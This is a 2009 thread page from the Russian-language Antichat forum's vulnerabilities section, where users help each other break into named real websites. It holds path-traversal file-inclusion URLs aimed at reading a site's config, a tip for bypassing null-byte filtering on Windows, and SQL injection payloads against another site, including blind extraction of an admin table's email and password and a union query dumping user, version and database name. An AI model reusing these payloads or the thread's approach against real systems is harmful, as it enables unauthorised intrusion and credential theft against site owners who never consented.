ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #7051  
Старый 07.05.2009, 21:21
geforce
Постоянный
Регистрация: 21.08.2008
Сообщений: 302
Провел на форуме:
458686

Репутация: -25
Отправить сообщение для geforce с помощью ICQ
Question

Цитата:
Сообщение от geezer.code  
во первых
сервер виндовый о чем явственно гласит надпись "in Y:\home\78.110.144.12\www\index.php"
значит никакого /etc/passwd

во-вторых
замена нулл-байта для винды - 255 точек(если пямять не изменяет)

upd: 266 ,пардон ,точек. более универсальная весч.
НУ ПОМОГИ ТОГДА!

По подробнее можешь расписать???
 

  #7052  
Старый 08.05.2009, 08:52
AET
Новичок
Регистрация: 17.03.2008
Сообщений: 23
Провел на форуме:
52106

Репутация: -2
По умолчанию

Цитата:
Сообщение от geforce  
НУ ПОМОГИ ТОГДА!

По подробнее можешь расписать???
зачем тебе это а там ведь инклуда. инклуду уже во многих саитах зашешают только не опотныие програмисты могут сделать такое. помоему ты хочеш узнать что можно сделать с таким ошибкой я тоже хотел бы узнать что можно сделать если наити на саитах такие инклуд ошибки и к чему они приведут если оно попоидет в руку хакера
 

  #7053  
Старый 08.05.2009, 13:47
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

Цитата:
Сообщение от geforce  
Ну вижу срезалось!

И что мне теперь с этим делать???
Код:
http://wow.alania.net/index.php?page=../index
http://wow.alania.net/?page=../config

Последний раз редактировалось Pashkela; 08.05.2009 в 14:25..
 

  #7054  
Старый 08.05.2009, 22:26
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Код:
http://www.ncrtp-hepc.ca/profiles.php?id=70
SQL-Inj. Help...

geforce, не пиши красным =\
Код:
http://www.google.com/search?client=opera&rls=en&q=site:forum.antichat.ru+wow.alania.net

Последний раз редактировалось mailbrush; 08.05.2009 в 22:28..
 

  #7055  
Старый 08.05.2009, 22:53
bug1z
Познающий
Регистрация: 07.05.2009
Сообщений: 64
Провел на форуме:
418218

Репутация: 59
По умолчанию

2mailbrush
Там одно поле:

Код:
http://www.ncrtp-hepc.ca/profiles.php?id=70+order+by+1--+
И четвёртая ветка:

Код:
http://www.ncrtp-hepc.ca/profiles.php?id=70+and+substring(version(),1,1)=4--

Но вывода скорее всего нету, но это не ознаает, что его и не будет, гдето здесь присалось об этом:

Цитата:
Если версия >=4 . или мы видим ошибку different number of columns это вовсе не означает, что вывода не будет.
Вероятность найти вывод всё равно остаётся. По этой теме идём читать сюда:
different number of columns
с поста 79 и вниз со всеми комментариями
Если ничего не выйдет, то работай подзапросами!

Последний раз редактировалось bug1z; 08.05.2009 в 22:58..
 

  #7056  
Старый 08.05.2009, 22:59
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

Цитата:
Сообщение от mailbrush  
SQL-Inj. Help...
http://www.ncrtp-hepc.ca/profiles.php?id=70+and+ascii(substring((select+con cat_ws(0x2F,email,pwd)+from+admin+limit+0,1),1,1)) >1
 

  #7057  
Старый 08.05.2009, 23:06
oRb
Members of Antichat - Level 5
Регистрация: 09.05.2008
Сообщений: 304
Провел на форуме:
7875940

Репутация: 2362
По умолчанию

Цитата:
Сообщение от mailbrush  
Код:
http://www.ncrtp-hepc.ca/profiles.php?id=70
SQL-Inj. Help...
Там только одно поле и нету вывода. Заюзай эту лучше:
http://www.ncrtp-hepc.ca/profiles.php?type=-3+union+select+1,concat_ws(0x3a,user(),version(),d atabase()),3,4,5,6,7/*

ps: Тут еще прикольный листинг директорий есть, может пригодится: http://www.ncrtp-hepc.ca/photos.php?album=../
 

  #7058  
Старый 09.05.2009, 03:58
crazy~driver
Познающий
Регистрация: 21.12.2008
Сообщений: 93
Провел на форуме:
391983

Репутация: 39
Отправить сообщение для crazy~driver с помощью ICQ
По умолчанию

у меня такой вопрос
как если есть листинг дирректории просмотреть код php файла
 

  #7059  
Старый 09.05.2009, 06:43
Iceangel_
Members of Antichat - Level 5
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206

Репутация: 1861


По умолчанию

2 crazy~driver
Не посмотришь, т.к. php интерпретируется на стороне сервера, независимо от включенного\выключенного листинга директорий
 

  #7060  
Старый 09.05.2009, 08:49
crazy~driver
Познающий
Регистрация: 21.12.2008
Сообщений: 93
Провел на форуме:
391983

Репутация: 39
Отправить сообщение для crazy~driver с помощью ICQ
По умолчанию

ясненько жаль конечно bak как назло нет
спс iceangel
 
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ